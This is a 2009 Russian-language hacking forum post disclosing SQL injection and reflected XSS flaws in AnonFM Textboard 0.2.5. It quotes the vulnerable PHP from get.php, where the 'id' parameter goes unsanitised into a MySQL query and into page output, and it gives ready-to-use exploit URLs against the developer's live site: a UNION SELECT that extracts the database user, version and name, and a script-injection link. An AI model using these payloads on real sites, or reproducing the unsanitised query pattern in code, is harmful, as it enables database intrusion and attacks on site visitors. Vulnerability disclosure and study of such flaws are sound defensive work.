AnonFM Textboard

Discussion in 'Веб-уязвимости' started by Ded MustD!e, 16 Sep 2009.

  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Уязвимость: SQL-Inj & pXSS
    Продукт: AnonFM Textboard
    Версия: 0.2.5
    Уязвимый файл get.php
    Код:
    PHP:
    ...
    $postid1 $_GET['id'];
    ...
    $postquery mysql_query("SELECT message,number,postid FROM threads WHERE postid=$postid1");
    $queryresult mysql_fetch_array($postquery);

    if (
    $queryresult == '') { }
    else {
      
    $postid $queryresult['postid'];
      echo 
    "    <td class=\"tdb1\" id=\"a" $queryresult['number'] . "\">" $queryresult['message'] . "</td>\n";
      echo 
    "    <td class=\"tdb12\"><a class=\"green\">#" $queryresult['number'] . "</a> (<a class=\"ilnk\" href=\"mod.php?post=0&id=$postid&postid=$postid\">Mod</a>)<br />ID: $postid1</td>";
    }
    Пример на сайте разработчика:
    SQL:
    Code:
    http://www.avuc.nl/c/get.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database()),2,3--+
    XSS:
    Code:
    http://www.avuc.nl/c/get.php?id=1252679693%22%3E%3Cscript%3Ealert()%3C/script%3E
    Пассивки там вообще везде...
     
    4 people like this.